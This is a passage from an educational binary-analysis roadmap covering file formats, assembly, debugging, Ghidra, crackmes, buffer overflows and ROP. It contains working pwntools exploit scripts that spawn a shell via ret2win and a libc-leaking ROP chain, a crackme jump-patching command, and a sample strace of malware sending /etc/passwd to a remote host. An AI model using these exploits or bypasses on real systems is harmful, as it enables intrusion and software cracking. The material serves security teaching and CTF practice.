LEARN BINARY ANALYSIS

Learn Binary Analysis: From Zero to Reverse Engineering Master

Goal: Deeply understand binary analysis—from file formats and assembly to disassembly, debugging, exploitation, malware analysis, and building your own reverse engineering tools.

Why Learn Binary Analysis?

Binary analysis is the art of understanding compiled programs without source code. It’s the foundation of:

Security Research: Finding vulnerabilities in closed-source software
Malware Analysis: Understanding what malicious software does
CTF Competitions: Binary exploitation (pwn) challenges
Game Hacking/Modding: Reverse engineering game mechanics
Software Archaeology: Understanding legacy systems
Compiler Development: Seeing how high-level code becomes machine code

After completing these projects, you will:

Read and understand x86/x64 assembly fluently
Analyze any binary file format (ELF, PE, Mach-O)
Use professional tools (Ghidra, IDA, radare2, GDB)
Exploit buffer overflows and build ROP chains
Analyze malware safely and effectively
Build your own disassembler and analysis tools

Core Concept Analysis

The Binary Analysis Landscape

┌─────────────────────────────────────────────────────────────────────────┐
│                        SOURCE CODE (if available)                        │
│                                                                          │
│   int main() {                                                          │
│       char buf[64];                                                     │
│       gets(buf);        // Vulnerable!                                  │
│       return 0;                                                         │
│   }                                                                      │
└─────────────────────────────────────────────────────────────────────────┘
                                 │
                                 ▼ Compilation
┌─────────────────────────────────────────────────────────────────────────┐
│                        BINARY EXECUTABLE                                 │
│                                                                          │
│   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00   .ELF............   │
│   03 00 3e 00 01 00 00 00 40 10 00 00 00 00 00 00   ..>.....@.......   │
│   ...                                                                    │
└─────────────────────────────────────────────────────────────────────────┘
                                 │
          ┌──────────────────────┼──────────────────────┐
          ▼                      ▼                      ▼
┌──────────────────┐  ┌──────────────────┐  ┌──────────────────┐
│ STATIC ANALYSIS  │  │ DYNAMIC ANALYSIS │  │   EXPLOITATION   │
│                  │  │                  │  │                  │
│ • Disassembly    │  │ • Debugging      │  │ • Buffer Overflow│
│ • Decompilation  │  │ • Tracing        │  │ • ROP Chains     │
│ • CFG Analysis   │  │ • Instrumentation│  │ • Shellcode      │
│ • String Search  │  │ • Emulation      │  │ • Format Strings │
└──────────────────┘  └──────────────────┘  └──────────────────┘

Key Concepts Explained

1. Binary File Formats

ELF (Executable and Linkable Format) - Linux/Unix

┌──────────────────────────────────────────┐
│             ELF Header (64 bytes)        │
│  • Magic: 0x7F 'E' 'L' 'F'               │
│  • Class: 32-bit or 64-bit               │
│  • Entry point address                    │
│  • Program header offset                  │
│  • Section header offset                  │
├──────────────────────────────────────────┤
│         Program Header Table             │
│  (Segments - runtime view)               │
│  • PT_LOAD: Loadable segments            │
│  • PT_DYNAMIC: Dynamic linking info      │
│  • PT_INTERP: Interpreter path           │
├──────────────────────────────────────────┤
│              Sections                     │
│  .text    - Executable code              │
│  .data    - Initialized data             │
│  .bss     - Uninitialized data           │
│  .rodata  - Read-only data (strings)     │
│  .plt     - Procedure Linkage Table      │
│  .got     - Global Offset Table          │
│  .symtab  - Symbol table                 │
│  .strtab  - String table                 │
├──────────────────────────────────────────┤
│         Section Header Table             │
│  (Sections - linking view)               │
└──────────────────────────────────────────┘

PE (Portable Executable) - Windows

┌──────────────────────────────────────────┐
│           DOS Header                      │
│  • Magic: 'MZ' (0x5A4D)                  │
│  • e_lfanew: Offset to PE header         │
├──────────────────────────────────────────┤
│           DOS Stub                        │
│  "This program cannot be run in DOS mode"│
├──────────────────────────────────────────┤
│           PE Signature: "PE\0\0"         │
├──────────────────────────────────────────┤
│           COFF File Header               │
│  • Machine type (x86, x64, ARM)          │
│  • Number of sections                     │
│  • Timestamp                             │
├──────────────────────────────────────────┤
│        Optional Header (PE32/PE32+)      │
│  • Entry point (AddressOfEntryPoint)     │
│  • ImageBase (preferred load address)    │
│  • Data directories (imports, exports)   │
├──────────────────────────────────────────┤
│           Section Headers                 │
│  .text   - Code                          │
│  .data   - Initialized data              │
│  .rdata  - Read-only data, imports       │
│  .rsrc   - Resources (icons, dialogs)    │
└──────────────────────────────────────────┘

2. x86/x64 Assembly Fundamentals

Registers (x64)

General Purpose (64-bit):
┌─────────────────────────────────────────────────────────────┐
│ RAX (accumulator)      │ Return values, arithmetic          │
│ RBX (base)             │ Callee-saved, general purpose      │
│ RCX (counter)          │ Arg 4, loop counter                │
│ RDX (data)             │ Arg 3, I/O, multiplication         │
│ RSI (source index)     │ Arg 2, string source               │
│ RDI (destination)      │ Arg 1, string destination          │
│ RBP (base pointer)     │ Stack frame base (callee-saved)    │
│ RSP (stack pointer)    │ Current stack top                  │
│ R8-R15                 │ Additional registers (R8-R11 args) │
└─────────────────────────────────────────────────────────────┘

Special Registers:
┌─────────────────────────────────────────────────────────────┐
│ RIP (instruction ptr)  │ Address of next instruction        │
│ RFLAGS                 │ Status flags (ZF, CF, SF, OF)      │
└─────────────────────────────────────────────────────────────┘

Register Sizes:
┌─────────────────────────────────────────────────────────────┐
│ 64-bit │ 32-bit │ 16-bit │ 8-bit high │ 8-bit low │
│  RAX   │  EAX   │   AX   │     AH     │    AL     │
│  RBX   │  EBX   │   BX   │     BH     │    BL     │
│  RCX   │  ECX   │   CX   │     CH     │    CL     │
│  RDX   │  EDX   │   DX   │     DH     │    DL     │
└─────────────────────────────────────────────────────────────┘

Calling Conventions

Linux x64 (System V AMD64 ABI):
  Arguments: RDI, RSI, RDX, RCX, R8, R9 (then stack)
  Return:    RAX (and RDX for 128-bit)
  Caller-saved: RAX, RCX, RDX, RSI, RDI, R8-R11
  Callee-saved: RBX, RBP, R12-R15

Windows x64:
  Arguments: RCX, RDX, R8, R9 (then stack, with shadow space)
  Return:    RAX
  Caller-saved: RAX, RCX, RDX, R8-R11
  Callee-saved: RBX, RBP, RDI, RSI, R12-R15

Common Instructions

; Data Movement
mov  rax, rbx       ; rax = rbx
lea  rax, [rbx+8]   ; rax = address of rbx+8 (load effective address)
push rax            ; Push rax onto stack
pop  rax            ; Pop top of stack into rax

; Arithmetic
add  rax, rbx       ; rax = rax + rbx
sub  rax, rbx       ; rax = rax - rbx
imul rax, rbx       ; rax = rax * rbx (signed)
xor  rax, rax       ; rax = 0 (clear register, common idiom)

; Comparison & Jumps
cmp  rax, rbx       ; Compare (sets flags)
test rax, rax       ; AND without storing (sets ZF if rax == 0)
jmp  label          ; Unconditional jump
je   label          ; Jump if equal (ZF=1)
jne  label          ; Jump if not equal (ZF=0)
jl   label          ; Jump if less (signed)
jg   label          ; Jump if greater (signed)

; Function Calls
call func           ; Push return address, jump to func
ret                 ; Pop return address, jump to it

; System Calls (Linux x64)
syscall             ; Invoke kernel (syscall number in RAX)

3. Stack Layout (x64)

High addresses
┌──────────────────────────────────────────┐
│           Previous Stack Frame           │
├──────────────────────────────────────────┤
│              Return Address              │  ← Pushed by CALL
├──────────────────────────────────────────┤
│              Saved RBP                   │  ← Pushed by function prologue
├──────────────────────────────────────────┤  ← RBP points here
│              Local Variable 1            │
├──────────────────────────────────────────┤
│              Local Variable 2            │
├──────────────────────────────────────────┤
│              Buffer (e.g., char[64])     │
├──────────────────────────────────────────┤  ← RSP points here
│              (Stack grows down)          │
└──────────────────────────────────────────┘
Low addresses

Function Prologue:
    push rbp          ; Save old base pointer
    mov  rbp, rsp     ; Set new base pointer
    sub  rsp, N       ; Allocate N bytes for locals

Function Epilogue:
    mov  rsp, rbp     ; Restore stack pointer
    pop  rbp          ; Restore old base pointer
    ret               ; Return to caller

4. Buffer Overflow Basics

Normal execution:
┌─────────────┐
│ Return Addr │ → points to caller
├─────────────┤
│ Saved RBP   │
├─────────────┤
│ Buffer[64]  │ ← User input goes here
└─────────────┘

After overflow:
┌─────────────┐
│ AAAA...AAAA │ ← Overwritten return address!
├─────────────┤     Now points to attacker code
│ AAAA...AAAA │ ← Overwritten saved RBP
├─────────────┤
│ AAAAAAAAAA  │ ← Original buffer, filled with 'A's
│ AAAAAAAAAA  │
│ AAAAAAAAAA  │
└─────────────┘

5. Static vs Dynamic Analysis

Aspect	Static Analysis	Dynamic Analysis
Execution	No execution	Runs the binary
Tools	Disassembler, Decompiler	Debugger, Tracer
Pros	Safe, complete coverage	See actual behavior
Cons	Can’t see runtime values	May miss code paths
Examples	Ghidra, IDA, radare2	GDB, strace, ltrace

6. Modern Protections

┌─────────────────────────────────────────────────────────────┐
│ Protection           │ What it does                         │
├─────────────────────────────────────────────────────────────┤
│ ASLR                 │ Randomize memory layout              │
│ Stack Canary         │ Detect stack buffer overflows        │
│ NX/DEP               │ Non-executable stack/heap            │
│ PIE                  │ Position-independent executable      │
│ RELRO                │ Read-only GOT after relocation       │
│ CFI                  │ Control-flow integrity               │
└─────────────────────────────────────────────────────────────┘

Check protections with checksec:
$ checksec --file=./binary
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

Project List

The following 18 projects will teach you binary analysis from fundamentals to advanced techniques.

Project 1: ELF File Parser

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: C
Alternative Programming Languages: Python, Rust, Go
Coolness Level: Level 3: Genuinely Clever
Business Potential: 1. The “Resume Gold”
Difficulty: Level 2: Intermediate
Knowledge Area: Binary Formats / File Parsing
Software or Tool: ELF binaries, hex editor
Main Book: “Practical Binary Analysis” by Dennis Andriesse

What you’ll build: A command-line tool that parses ELF files and displays all headers, sections, segments, symbols, and relocations in a human-readable format—like a simplified readelf.

Why it teaches binary analysis: Every reverse engineering task starts with understanding the file format. Building a parser forces you to understand every byte of the ELF structure.

Core challenges you’ll face:

Parsing the ELF header → maps to understanding magic bytes, class (32/64-bit), endianness
Reading program headers → maps to segments, what gets loaded into memory
Reading section headers → maps to sections, symbols, strings
Handling different architectures → maps to x86, ARM, MIPS variations

Resources for key challenges:

Linux Audit - ELF Binaries - Excellent overview
“Practical Binary Analysis” Chapter 2 - Comprehensive ELF explanation
man elf - The ELF specification

Key Concepts:

ELF Header Structure: “Practical Binary Analysis” Ch. 2 - Andriesse
Program vs Section Headers: elf(5) man page
Symbol Tables: “Learning ELF” - Can Ozkan (Medium)

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: C programming, understanding of pointers and structs, familiarity with hexadecimal

Real world outcome:

$ ./elf_parser /bin/ls
ELF Header:
  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00
  Class:   ELF64
  Data:    2's complement, little endian
  Version: 1 (current)
  OS/ABI:  UNIX - System V
  Type:    DYN (Shared object file)
  Machine: AMD x86-64
  Entry:   0x6b10

Program Headers:
  Type           Offset   VirtAddr         FileSiz  MemSiz   Flg
  PHDR           0x000040 0x0000000000000040 0x0002d8 0x0002d8 R
  INTERP         0x000318 0x0000000000000318 0x00001c 0x00001c R
  LOAD           0x000000 0x0000000000000000 0x003510 0x003510 R
  ...

Sections:
  [Nr] Name              Type       Address          Size
  [ 0]                   NULL       0x0000000000000000 0x0
  [ 1] .interp           PROGBITS   0x0000000000000318 0x1c
  [ 2] .note.gnu.build-id NOTE      0x0000000000000338 0x24
  ...

Symbols:
  Num:    Value          Size Type    Bind   Name
    1: 0000000000000000     0 FUNC    GLOBAL printf@GLIBC_2.2.5
    2: 0000000000006b10   123 FUNC    GLOBAL main
  ...

Implementation Hints:

Start by mapping the ELF header structure:

// Don't write code, but understand this structure:
// Elf64_Ehdr contains:
//   e_ident[16]  - Magic number and other info
//   e_type       - Object file type (ET_EXEC, ET_DYN, etc.)
//   e_machine    - Architecture (EM_X86_64, EM_ARM, etc.)
//   e_entry      - Entry point virtual address
//   e_phoff      - Program header table file offset
//   e_shoff      - Section header table file offset
//   e_phnum      - Number of program headers
//   e_shnum      - Number of section headers

Questions to guide your implementation:

How do you detect if a file is 32-bit or 64-bit ELF?
How do you find the string table section to get section names?
What’s the difference between .dynsym and .symtab?
How do program headers map sections to memory segments?

Learning milestones:

Parse ELF header correctly → Understand file identification
Iterate program headers → Understand runtime memory layout
Iterate section headers → Understand linking and symbols
Resolve symbol names → Understand string tables

Project 2: PE File Parser

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: C
Alternative Programming Languages: Python, Rust
Coolness Level: Level 3: Genuinely Clever
Business Potential: 1. The “Resume Gold”
Difficulty: Level 2: Intermediate
Knowledge Area: Binary Formats / Windows Executables
Software or Tool: PE files, Windows or Wine
Main Book: “Practical Malware Analysis” by Sikorski & Honig

What you’ll build: A PE file parser that extracts headers, sections, imports, exports, and resources from Windows executables.

Why it teaches binary analysis: Windows malware analysis requires understanding PE format. Most real-world targets are Windows binaries.

Core challenges you’ll face:

DOS header and stub → maps to legacy compatibility
COFF and Optional headers → maps to PE32 vs PE32+
Import Address Table (IAT) → maps to dynamic linking, API calls
Export directory → maps to DLL functions

Resources for key challenges:

MCSI - Reverse Engineering PE Part 1 & 2
“Practical Malware Analysis” Chapter 1
PE Format (Microsoft Docs)

Key Concepts:

PE Structure: “Practical Malware Analysis” Ch. 1
Import Table: PE Format specification
Resources: CFF Explorer documentation

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: Project 1 (ELF Parser), understanding of Windows APIs

Real world outcome:

$ ./pe_parser suspicious.exe
DOS Header:
  Magic: MZ (0x5a4d)
  PE Offset: 0x100

PE Header:
  Signature: PE (0x4550)
  Machine: x64 (0x8664)
  Sections: 5
  Timestamp: 2024-01-15 14:32:01

Optional Header:
  Magic: PE32+ (0x20b)
  Entry Point: 0x1400012a0
  Image Base: 0x140000000

Sections:
  Name     VirtAddr   VirtSize   RawSize    Flags
  .text    0x1000     0x5a00     0x5c00     CODE,EXECUTE,READ
  .rdata   0x7000     0x1e00     0x2000     READ
  .data    0x9000     0x400      0x200      READ,WRITE

Imports:
  KERNEL32.dll:
    - CreateFileA
    - ReadFile
    - WriteFile
    - VirtualAlloc    ← Suspicious!
  WS2_32.dll:
    - socket          ← Network activity!
    - connect
    - send
    - recv

Implementation Hints:

The PE format has a layered structure. Parse it step by step:

Read DOS header at offset 0
Follow e_lfanew to find PE signature
Parse COFF header immediately after signature
Parse Optional Header (size varies by PE32 vs PE32+)
Parse section headers after Optional Header
Use Data Directories to find imports, exports, resources

Key questions:

What does IMAGE_DIRECTORY_ENTRY_IMPORT point to?
How are imported function names resolved (hint: thunks)?
What’s the difference between RVA and file offset?

Learning milestones:

Parse headers correctly → Understand PE structure
Extract imports → See what APIs the program uses
Extract exports → Understand DLLs
Handle both PE32 and PE32+ → Support all Windows binaries

Project 3: Build a Simple Disassembler

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: C
Alternative Programming Languages: Python (with Capstone), Rust
Coolness Level: Level 4: Hardcore Tech Flex
Business Potential: 1. The “Resume Gold”
Difficulty: Level 3: Advanced
Knowledge Area: Disassembly / x86 Instruction Encoding
Software or Tool: Intel manuals, Capstone engine
Main Book: “Intel 64 and IA-32 Architectures Software Developer’s Manual”

What you’ll build: A disassembler that converts x86/x64 machine code into human-readable assembly instructions.

Why it teaches binary analysis: Understanding how machine code maps to assembly is fundamental. Building a disassembler forces you to understand instruction encoding.

Core challenges you’ll face:

Variable-length instructions → maps to x86 has 1-15 byte instructions
Prefixes and REX bytes → maps to operand size, 64-bit registers
ModR/M and SIB bytes → maps to addressing modes
Immediate and displacement → maps to constants and offsets

Resources for key challenges:

MyDisassembler (GitHub) - Reference implementation
Capstone Engine - If you want to use a library
Intel SDM Volume 2 - Instruction Set Reference

Key Concepts:

x86 Instruction Format: Intel SDM Volume 2, Chapter 2
ModR/M Encoding: X86 Opcode Reference
Linear vs Recursive Descent: “Practical Binary Analysis” Ch. 6

Difficulty: Advanced Time estimate: 2-4 weeks Prerequisites: Projects 1-2, solid x86 assembly knowledge

Real world outcome:

$ ./disasm program.bin
00000000: 55                    push rbp
00000001: 48 89 e5              mov rbp, rsp
00000004: 48 83 ec 40           sub rsp, 0x40
00000008: 48 8d 45 c0           lea rax, [rbp-0x40]
0000000c: 48 89 c7              mov rdi, rax
0000000f: e8 xx xx xx xx        call 0x????????
00000014: 31 c0                 xor eax, eax
00000016: c9                    leave
00000017: c3                    ret

Implementation Hints:

x86 instruction format:

[Prefixes] [REX] [Opcode] [ModR/M] [SIB] [Displacement] [Immediate]
   0-4       0-1    1-3      0-1     0-1      0-4           0-8

Start simple:

Handle single-byte opcodes first (push, pop, ret, nop)
Add instructions with ModR/M byte (mov, add, sub)
Add REX prefix support for 64-bit
Add SIB byte for complex addressing
Handle prefixes (operand size, segment override)

Questions to consider:

How do you distinguish mov eax, ebx from mov eax, [ebx]?
What does the REX.W prefix do?
How do you handle instructions with the same opcode but different meanings?

Learning milestones:

Disassemble basic instructions → Single-byte opcodes work
Handle ModR/M byte → Register and memory operands
Support 64-bit mode → REX prefix parsing
Handle all addressing modes → SIB byte, displacements

Project 4: GDB Debugging Deep Dive

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: C (for targets), GDB commands
Alternative Programming Languages: Python (GDB scripting)
Coolness Level: Level 3: Genuinely Clever
Business Potential: 1. The “Resume Gold”
Difficulty: Level 2: Intermediate
Knowledge Area: Debugging / Dynamic Analysis
Software or Tool: GDB, pwndbg/GEF, GCC
Main Book: “The Art of Debugging with GDB” by Matloff & Salzman

What you’ll build: A series of increasingly complex debugging exercises, culminating in a GDB Python extension for automated analysis.

Why it teaches binary analysis: Debugging is the most direct way to understand program behavior. GDB is the most powerful open-source debugger.

Core challenges you’ll face:

Setting breakpoints → maps to controlling execution
Examining memory → maps to understanding data layout
Stepping through code → maps to following control flow
Scripting with Python → maps to automating analysis

Resources for key challenges:

Reversing a Binary with GDB
GDB Tutorial (GitHub)
pwndbg - Enhanced GDB for exploit development

Key Concepts:

Breakpoints and Watchpoints: GDB documentation
Memory Examination: “The Art of Debugging” Ch. 3
Python GDB API: GDB Python documentation

Difficulty: Intermediate Time estimate: 1-2 weeks Prerequisites: Basic C, assembly basics

Real world outcome:

$ gdb ./target_binary
(gdb) break main
(gdb) run
(gdb) disassemble
(gdb) info registers
(gdb) x/20x $rsp           # Examine stack
(gdb) x/s 0x402000         # Examine string
(gdb) set $rax = 0x1337    # Modify register
(gdb) python
>>> gdb.execute("info registers")
>>> frame = gdb.selected_frame()
>>> print(frame.read_register("rip"))
>>> end
(gdb) continue

Implementation Hints:

Essential GDB commands to master:

# Execution control
run [args]           # Start program
continue (c)         # Continue execution
stepi (si)           # Step one instruction
nexti (ni)           # Step over calls
finish               # Run until function returns

# Breakpoints
break *0x401000      # Break at address
break main           # Break at function
watch *0x7ffd1234    # Break on memory write
catch syscall write  # Break on syscall

# Examination
disassemble main     # Show assembly
info registers       # All registers
x/10i $rip           # 10 instructions at RIP
x/20wx $rsp          # 20 words at stack
x/s 0x402000         # String at address
info proc mappings   # Memory layout

# Modification
set $rax = 0         # Change register
set *(int*)0x401000 = 0x90909090  # Patch memory

Create exercises:

Find a hidden password in a crackme
Trace a function’s execution
Modify a return value to bypass a check
Write a GDB script to log all function calls

Learning milestones:

Basic debugging → Set breakpoints, step, examine
Memory analysis → Understand stack and heap layout
Modify execution → Change registers and memory
Python scripting → Automate repetitive tasks

Project 5: Ghidra Reverse Engineering

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: Java (for scripts), Ghidra
Alternative Programming Languages: Python (Ghidrathon)
Coolness Level: Level 4: Hardcore Tech Flex
Business Potential: 2. The “Micro-SaaS / Pro Tool”
Difficulty: Level 2: Intermediate
Knowledge Area: Static Analysis / Decompilation
Software or Tool: Ghidra (NSA), sample binaries
Main Book: “Ghidra Software Reverse Engineering for Beginners”

What you’ll build: Complete reverse engineering of several binaries of increasing complexity, including writing Ghidra scripts for automation.

Why it teaches binary analysis: Ghidra is the industry-standard free tool. Its decompiler produces C-like code from assembly, dramatically speeding up analysis.

Core challenges you’ll face:

Navigating Ghidra’s UI → maps to efficient workflow
Using the decompiler → maps to understanding control flow
Cross-references → maps to finding function usage
Writing scripts → maps to automating analysis

Resources for key challenges:

Key Concepts:

Code Browser: Ghidra documentation
Decompiler Window: “Ghidra RE for Beginners” Ch. 4
Ghidra Scripting: Ghidra API documentation

Difficulty: Intermediate Time estimate: 2-3 weeks Prerequisites: Projects 1-4, solid assembly knowledge

Real world outcome:

Analyzing a CTF crackme in Ghidra:

1. Load binary → Auto-analysis runs
2. Find main() → Entry point analysis
3. Decompile main() → See C-like code:

   int main(int argc, char **argv) {
       char input[32];
       printf("Enter password: ");
       scanf("%s", input);
       if (check_password(input)) {
           printf("Correct!\n");
       } else {
           printf("Wrong!\n");
       }
       return 0;
   }

4. Analyze check_password() → Find algorithm
5. Write keygen or patch binary

Implementation Hints:

Ghidra workflow:

Create project → Import binary
Let auto-analysis complete
Navigate with ‘G’ (goto address) or symbol tree
Use ‘L’ to rename functions/variables
Use ‘;’ to add comments
Use ‘X’ to find cross-references

Scripting example (Ghidra Python):

# Find all calls to dangerous functions
dangerous = ["gets", "strcpy", "sprintf"]
for func_name in dangerous:
    func = getFunction(func_name)
    if func:
        refs = getReferencesTo(func.getEntryPoint())
        for ref in refs:
            print(f"Call to {func_name} at {ref.getFromAddress()}")

Learning milestones:

Navigate efficiently → Find functions, strings, imports
Understand decompiler output → Read C-like code
Rename and annotate → Make code understandable
Write scripts → Automate repetitive analysis

Project 6: Crackme Challenges

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: Assembly analysis, Python for keygens
Alternative Programming Languages: Any
Coolness Level: Level 4: Hardcore Tech Flex
Business Potential: 1. The “Resume Gold”
Difficulty: Level 2: Intermediate
Knowledge Area: Reverse Engineering / Password Bypass
Software or Tool: Ghidra, GDB, crackmes.one
Main Book: “Reversing: Secrets of Reverse Engineering” by Eldad Eilam

What you’ll build: Solve 10+ crackme challenges of increasing difficulty, learning patching, keygen writing, and anti-debugging bypass.

Why it teaches binary analysis: Crackmes are purpose-built learning tools. They teach you to find and understand password checks, then bypass them.

Core challenges you’ll face:

Finding the check → maps to string references, control flow
Understanding the algorithm → maps to decompilation, debugging
Patching vs keygen → maps to two approaches to bypass
Anti-debugging → maps to detection evasion

Resources for key challenges:

crackmes.one - Download challenges
crackme.re walkthroughs - Detailed solutions
Ghidra Crackme Tutorial

Key Concepts:

Patching: Tutorial #10 - The Levels of Patching
Keygen Writing: “Reversing” Ch. 5 - Eilam
Anti-Debugging Bypass: OpenRCE Anti-Reversing Database

Difficulty: Intermediate Time estimate: 2-4 weeks Prerequisites: Projects 4-5 (GDB, Ghidra)

Real world outcome:

# Approach 1: Patching
$ ./crackme
Enter password: wrong
Access Denied!

# Found the check: JNE (jump if not equal) to fail
# Patch JNE to JE (or NOP it out)
$ xxd crackme | grep "75 28"
00001234: 75 28  # JNE +0x28
$ printf '\x90\x90' | dd of=crackme bs=1 seek=4660 conv=notrunc
$ ./crackme
Enter password: anything
Access Granted!

# Approach 2: Keygen
# Found algorithm: password = (username XOR 0x55) + 0x1337
$ python3 keygen.py "admin"
Valid password for 'admin': 0xAB12CD34

Implementation Hints:

Systematic approach:

Run the binary to understand expected behavior
Find strings (“Enter password”, “Access Denied”)
Find cross-references to those strings
Trace backwards to find the comparison
Understand what makes it pass
Either patch the jump or write a keygen

Patching levels:

LAME: NOP out the check entirely
Better: Invert the jump condition
Good: Patch the comparison to always succeed
Best: Understand algorithm, write keygen

Questions:

What’s the difference between JE and JNE?
How do you find the password comparison in decompiled code?
What are common string comparison functions?

Learning milestones:

Solve easy crackmes → Find obvious password checks
Understand algorithms → XOR, hashing, encoding
Write keygens → Reverse the algorithm
Bypass protections → Handle obfuscation

Project 7: Buffer Overflow Exploitation

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: C (targets), Python (exploits)
Alternative Programming Languages: Assembly for shellcode
Coolness Level: Level 5: Pure Magic (Super Cool)
Business Potential: 1. The “Resume Gold”
Difficulty: Level 3: Advanced
Knowledge Area: Binary Exploitation / Memory Corruption
Software or Tool: GDB, pwntools, checksec
Main Book: “Hacking: The Art of Exploitation” by Jon Erickson

What you’ll build: Working exploits for buffer overflow vulnerabilities, progressing from simple stack smashing to bypass ASLR and stack canaries.

Why it teaches binary analysis: Understanding exploitation gives you insight into why security mitigations exist and how low-level memory works.

Core challenges you’ll face:

Finding the offset → maps to pattern generation, EIP/RIP control
Controlling execution → maps to return address overwrite
Bypassing NX → maps to return-to-libc, ROP
Bypassing ASLR → maps to info leaks, partial overwrite

Resources for key challenges:

Key Concepts:

Stack Layout: “Hacking: Art of Exploitation” Ch. 2
Shellcode: “Hacking: Art of Exploitation” Ch. 5
Return-Oriented Programming: “Practical Binary Analysis” Ch. 10

Difficulty: Advanced Time estimate: 3-4 weeks Prerequisites: Projects 1-6, solid C and assembly

Real world outcome:

from pwn import *

# Connect to target
p = process('./vulnerable')

# Find offset with pattern
offset = 72

# Build payload
payload = b'A' * offset           # Fill buffer
payload += p64(0x401337)          # Overwrite return address with win()

# Send payload
p.sendline(payload)

# Get shell!
p.interactive()

# Output:
# [*] Switching to interactive mode
# $ whoami
# root
# $ cat flag.txt
# FLAG{buffer_overflow_mastered}

Implementation Hints:

Progression:

ret2win: Overwrite return address to call win() function
ret2shellcode: Jump to shellcode on stack (no NX)
ret2libc: Return to system("/bin/sh") (bypass NX)
ROP chain: Chain gadgets for complex operations
GOT overwrite: Hijack function pointers
Format string: Arbitrary read/write

Finding offset:

from pwn import *

# Generate cyclic pattern
pattern = cyclic(200)
# Feed to program, get crash address
# Use cyclic_find to get offset
offset = cyclic_find(0x61616168)  # 'haaa' in little-endian

Key questions:

How do you find the offset to the return address?
What’s the difference between 32-bit and 64-bit exploitation?
How do you find useful libc functions when ASLR is enabled?

Learning milestones:

Control EIP/RIP → Overwrite return address
Execute shellcode → Spawn a shell (no NX)
ROP chains → Bypass NX with gadgets
Leak addresses → Bypass ASLR

Project 8: Return-Oriented Programming (ROP)

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: Python (pwntools)
Alternative Programming Languages: Assembly understanding
Coolness Level: Level 5: Pure Magic (Super Cool)
Business Potential: 1. The “Resume Gold”
Difficulty: Level 4: Expert
Knowledge Area: Advanced Exploitation / Code Reuse
Software or Tool: ROPgadget, ropper, pwntools
Main Book: “The Shellcoder’s Handbook”

What you’ll build: Complex ROP chains that bypass NX protection by chaining together code snippets already in the binary.

Why it teaches binary analysis: ROP is the foundation of modern exploitation. It demonstrates deep understanding of calling conventions and code reuse.

Core challenges you’ll face:

Finding gadgets → maps to instruction sequences ending in ret
Chaining gadgets → maps to building functionality from fragments
Setting up arguments → maps to calling conventions (rdi, rsi, rdx)
Calling system() → maps to executing /bin/sh

Resources for key challenges:

Key Concepts:

Gadget Types: “The Shellcoder’s Handbook” Ch. 9
x64 Calling Convention: System V ABI
Stack Pivoting: ROP Emporium tutorials

Difficulty: Expert Time estimate: 2-3 weeks Prerequisites: Project 7 (Buffer Overflow)

Real world outcome:

from pwn import *

elf = ELF('./target')
libc = ELF('./libc.so.6')
rop = ROP(elf)

# Find gadgets
pop_rdi = rop.find_gadget(['pop rdi', 'ret'])[0]
ret = rop.find_gadget(['ret'])[0]

# Leak libc address
payload = flat(
    b'A' * offset,
    pop_rdi,
    elf.got['puts'],    # Argument: puts@GOT
    elf.plt['puts'],    # Call puts to leak
    elf.symbols['main'] # Return to main for second stage
)

p.sendline(payload)
leaked = u64(p.recv(6).ljust(8, b'\x00'))
libc.address = leaked - libc.symbols['puts']

# Second stage: call system("/bin/sh")
bin_sh = next(libc.search(b'/bin/sh'))
system = libc.symbols['system']

payload2 = flat(
    b'A' * offset,
    ret,                # Stack alignment
    pop_rdi,
    bin_sh,
    system
)

p.sendline(payload2)
p.interactive()

Implementation Hints:

Gadget hunting:

$ ROPgadget --binary ./target | grep "pop rdi"
0x00401233 : pop rdi ; ret
$ ROPgadget --binary ./target | grep "pop rsi"
0x00401231 : pop rsi ; pop r15 ; ret

Common ROP patterns:

Leak libc: Call puts(GOT_entry) to leak address
Calculate libc base: leaked_addr - offset = libc_base
Find /bin/sh: Search libc for “/bin/sh” string
Call system: pop rdi; ret + “/bin/sh” addr + system addr

Stack alignment:

x64 requires 16-byte stack alignment before call
Add a ret gadget if system() crashes

Learning milestones:

Find gadgets → Use ROPgadget or ropper
Chain simple ROP → Control function arguments
Leak libc → Bypass ASLR
Get shell → Complete exploitation chain

Project 9: Dynamic Analysis with strace/ltrace

File: LEARN_BINARY_ANALYSIS.md
Main Programming Language: Command line tools
Alternative Programming Languages: Python for automation
Coolness Level: Level 2: Practical but Forgettable
Business Potential: 1. The “Resume Gold”
Difficulty: Level 1: Beginner
Knowledge Area: Dynamic Analysis / System Calls
Software or Tool: strace, ltrace, Linux
Main Book: “The Linux Programming Interface” by Michael Kerrisk

What you’ll build: Analyze unknown binaries using only system call and library call tracing, without disassembly.

Why it teaches binary analysis: Sometimes you don’t need disassembly. Seeing what files a program opens and what APIs it calls reveals a lot.

Core challenges you’ll face:

Understanding syscall output → maps to knowing what each syscall does
Filtering noise → maps to focusing on interesting calls
Following child processes → maps to fork/exec tracing
Interpreting library calls → maps to understanding libc functions

Resources for key challenges:

Packt - Using ltrace and strace
Red Hat - ltrace Guide
“The Linux Programming Interface” - Syscall reference

Key Concepts:

System Calls: “The Linux Programming Interface” Ch. 3
Library Calls: ltrace man page
Process Tracing: strace man page

Difficulty: Beginner Time estimate: 3-5 days Prerequisites: Basic Linux command line

Real world outcome:

$ strace -f ./suspicious_binary 2>&1 | head -50
execve("./suspicious_binary", ...) = 0
openat(AT_FDCWD, "/etc/passwd", O_RDONLY) = 3   # Reading password file!
read(3, "root:x:0:0:...", 4096) = 2847
close(3)
socket(AF_INET, SOCK_STREAM, 0) = 4              # Opening socket!
connect(4, {sa_family=AF_INET, sin_port=htons(1337),
        sin_addr=inet_addr("10.0.0.1")}, 16) = 0  # Connecting to C2!
write(4, "root:x:0:0:...", 2847) = 2847          # Exfiltrating data!

$ ltrace ./crackme
__libc_start_main(...)
puts("Enter password: ")
